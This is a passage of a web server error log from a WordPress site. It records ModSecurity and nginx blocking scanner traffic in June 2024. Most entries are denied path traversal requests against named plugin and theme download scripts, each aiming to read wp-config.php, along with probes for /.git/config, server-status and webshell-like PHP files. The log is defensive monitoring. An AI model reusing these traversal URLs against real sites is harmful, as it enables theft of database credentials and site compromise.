"(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/plugin-newsletter/preview.php?data=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/plugin-newsletter/preview.php"] [unique_id "ZmDJX3-RSuYgfBobnK4nmgAAABQ"] [Wed Jun 05 15:24:02.938256 2024] [:error] [pid 6611:tid 139916260398848] [client 146.70.105.59:53526] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /mdocs-posts/?mdocs-img-preview=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/mdocs-posts/"] [unique_id "ZmDJYrfZx2Sf7LbCrFH3jQAAAMU"] [Wed Jun 05 15:24:03.077065 2024] [:error] [pid 6611:tid 139916159686400] [client 146.70.105.59:53528] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php"] [unique_id "ZmDJY7fZx2Sf7LbCrFH3jgAAANE"] [Wed Jun 05 15:24:06.165955 2024] [:error] [pid 6611:tid 139916364232448] [client 146.70.105.59:53536] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/estrutura-basica/scripts/download.php?arquivo=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/estrutura-basica/scripts/download.php"] [unique_id "ZmDJZrfZx2Sf7LbCrFH3kAAAAME"] [Wed Jun 05 15:24:07.438860 2024] [:error] [pid 5986:tid 139916184864512] [client 146.70.105.59:53540] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-publication-archive/includes/openfile.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-publication-archive/includes/openfile.php"] [unique_id "ZmDJZ-z5jJkMRt_Mf_6i-AAAAE4"] [Wed Jun 05 15:24:07.584153 2024] [:error] [pid 5985:tid 139916109330176] [client 146.70.105.59:53542] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/antioch/lib/scripts/download.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/antioch/lib/scripts/download.php"] [unique_id "ZmDJZ3-RSuYgfBobnK4nnQAAABc"] [Wed Jun 05 15:24:07.714531 2024] [:error] [pid 5985:tid 139916151293696] [client 146.70.105.59:53544] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/uploads/sb-download.php?file=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/uploads/sb-download.php"] [unique_id "ZmDJZ3-RSuYgfBobnK4nngAAABI"] [Wed Jun 05 15:24:08.987173 2024] [:error] [pid 6611:tid 139916100937472] [client 146.70.105.59:53548] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/apptha-slider-gallery/asgallDownload.php?imgname=..%2F..%2F..%2Fwp-load.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/apptha-slider-gallery/asgallDownload.php"] [unique_id "ZmDJaLfZx2Sf7LbCrFH3kQAAANg"] [Wed Jun 05 15:24:12.054134 2024] [:error] [pid 5986:tid 139916117722880] [client 146.70.105.59:53556] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /?mdocs-img-preview=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "ZmDJbOz5jJkMRt_Mf_6i-QAAAFY"] [Wed Jun 05 15:24:13.142650 2024] [:error] [pid 6611:tid 139916372625152] [client 146.70.105.59:53560] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php"] [unique_id "ZmDJbbfZx2Sf7LbCrFH3kwAAAMA"] [Wed Jun 05 15:24:13.288201 2024] [:error] [pid 5985:tid 139916372625152] [client 146.70.105.59:53562] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/urbancity/lib/scripts/download.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/urbancity/lib/scripts/download.php"] [unique_id "ZmDJbX-RSuYgfBobnK4noQAAAAA"] [Wed Jun 05 15:24:13.456780 2024] [:error] [pid 5987:tid 139916252006144] [client 146.70.105.59:53564] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/linenity/functions/download.php?imgurl=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/linenity/functions/download.php"] [unique_id "ZmDJbeddjqHaWkbIrEiTwwAAAIY"] [Wed Jun 05 15:24:13.581386 2024] [:error] [pid 6611:tid 139916277184256] [client 146.70.105.59:53566] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/duena/download.php?f=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/duena/download.php"] [unique_id "ZmDJbbfZx2Sf7LbCrFH3lAAAAMM"] [Wed Jun 05 15:24:13.718522 2024] [:error] [pid 5985:tid 139916210042624] [client 146.70.105.59:53568] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/PlixPro/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/PlixPro/download.php"] [unique_id "ZmDJbX-RSuYgfBobnK4nogAAAAs"] [Wed Jun 05 15:24:13.874067 2024] [:error] [pid 5987:tid 139916235220736] [client 146.70.105.59:53570] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.ini"] [unique_id "ZmDJbeddjqHaWkbIrEiTxAAAAIg"] [Wed Jun 05 15:24:14.006806 2024] [:error] [pid 5987:tid 139916277184256] [client 146.70.105.59:53572] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/sl_file_download.php?download_file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/sl_file_download.php"] [unique_id "ZmDJbuddjqHaWkbIrEiTxQAAAIM"] [Wed Jun 05 22:59:04.818675 2024] [:error] [pid 5985:tid 139916243613440] [client 93.174.93.127:59744] [client 93.174.93.127] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:file_uploader_nonce. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "136"] [id "950911"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <html found within ARGS:file_uploader_nonce: l>\\x0a\\x0a<html lang="] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZmE0CH-RSuYgfBobnK4ojgAAAAc"], referer: https://investigacionperu.com/ [Thu Jun 06 01:36:21.791239 2024] [authz_core:error] [pid 5986:tid 139916252006144] [client 64.227.70.2:34762] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/06 01:36:25 [error] 5864#5864: *251458 access forbidden by rule, client: 64.227.70.2, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Thu Jun 06 01:36:29.628393 2024] [authz_core:error] [pid 5986:tid 139916235220736] [client 146.190.103.103:34792] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/06 01:36:35 [error] 5861#5861: *251484 access forbidden by rule, client: 146.190.103.103, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Jun 06 03:28:17.137337 2024] [authz_core:error] [pid 14621:tid 140640695994112] [client 157.245.204.205:36860] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/06 03:28:23 [error] 14579#14579: *252769 access forbidden by rule, client: 157.245.204.205, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/06/06 04:59:37 [error] 14580#14580: *253646 access forbidden by rule, client: 83.147.52.49, server: investigacionperu.com, request: "GET /assets/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/06/06 11:04:00 [error] 14580#14580: *257628 access forbidden by rule, client: 83.147.52.49, server: investigacionperu.com, request: "GET /assets/.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Jun 06 11:23:05.311841 2024] [authz_core:error] [pid 14621:tid 140640474048256] [client 64.225.75.246:45288] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/06 11:23:09 [error] 14580#14580: *257901 access forbidden by rule, client: 64.225.75.246, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/06/06 14:46:23 [error] 14580#14580: *259926 access forbidden by rule, client: 83.147.52.49, server: webmail.investigacionperu.com, request: "GET /assets/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Thu Jun 06 16:22:44.293536 2024] [:error] [pid 14621:tid 140640507619072] [client 164.90.158.239:51038] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Thu Jun 06 16:22:59.545445 2024] [:error] [pid 15246:tid 140640574760704] [client 164.90.158.239:51078] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Thu Jun 06 16:22:59.682813 2024] [:error] [pid 15246:tid 140640704386816] [client 164.90.158.239:51080] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Thu Jun 06 16:23:39.804468 2024] [autoindex:error] [pid 14619:tid 140640541189888] [client 164.90.158.239:51168] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jun 06 16:23:48.837208 2024] [:error] [pid 15246:tid 140640432084736] [client 164.90.158.239:51202] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Thu Jun 06 16:23:49.772446 2024] [autoindex:error] [pid 14619:tid 140640549582592] [client 164.90.158.239:51206] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jun 06 16:23:50.578485 2024] [autoindex:error] [pid 15246:tid 140640566368000] [client 164.90.158.239:51210] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jun 06 16:23:58.001976 2024] [:error] [pid 14620:tid 140640557975296] [client 164.90.158.239:51232] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Thu Jun 06 16:24:01.554466 2024] [:error] [pid 14620:tid 140640549582592] [client 164.90.158.239:51234] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Thu Jun 06 16:24:44.355783 2024] [:error] [pid 15246:tid 140640687601408] [client 164.90.158.239:51348] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Thu Jun 06 16:24:59.498425 2024] [:error] [pid 15246:tid 140640532797184] [client 164.90.158.239:51384] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Thu Jun 06 16:24:59.604109 2024] [:error] [pid 15246:tid 140640440477440] [client 164.90.158.239:51386] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Thu Jun 06 16:25:39.923775 2024] [autoindex:error] [pid 15246:tid 140640557975296] [client 164.90.158.239:51474] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jun 06 16:25:49.066759 2024] [:error] [pid 14621:tid 140640499226368] [client 164.90.158.239:51502] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Thu Jun 06 16:25:49.951367 2024] [autoindex:error] [pid 14619:tid 140640482440960] [client 164.90.158.239:51506] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jun 06 16:25:50.815362 2024] [autoindex:error] [pid 14621:tid 140640516011776] [client 164.90.158.239:51510] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jun 06 16:25:56.843737 2024] [:error] [pid 14619:tid 140640474048256] [client 164.90.158.239:51538] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Thu Jun 06 16:25:56.954002 2024] [:error] [pid 14619:tid 140640432084736] [client 164.90.158.239:51542] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php 2024/06/06 22:13:20 [error] 14579#14579: *264922 access forbidden by rule, client: 83.147.52.49, server: cpanel.investigacionperu.com, request: "GET /assets/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/06/07 07:22:00 [error] 8253#8253: *270386 access forbidden by rule, client: 176.96.138.154, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/06/07 07:22:00 [error] 8253#8253: *270386 access forbidden by rule, client: 176.96.138.154, server: 